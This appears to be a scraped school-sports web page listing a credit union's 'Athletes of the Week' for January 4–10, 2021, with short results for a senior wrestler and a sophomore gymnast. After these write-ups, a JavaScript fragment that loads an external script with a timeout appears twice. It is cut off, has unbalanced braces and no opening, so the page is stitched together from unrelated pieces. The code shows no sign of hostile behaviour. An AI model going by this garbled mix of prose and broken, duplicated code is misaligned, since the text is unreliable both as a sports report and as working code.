Athletes of the Week
Kemba Credit Union Athletes of the Week 1/4/2021-1/10/2021
Josh Brogden
Senior, Wrestling
Josh went 3-0 over the weekend with 3 pins. He outscored his opponents 19-5 and didn’t give up an offensive point.
Madelyn Power
Sophomore, Gymnastics
Madelyn competed against 12 other teams in the CD Cup placing 4th All-around. She also placed 6th in the vault and 2nd in the bars.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();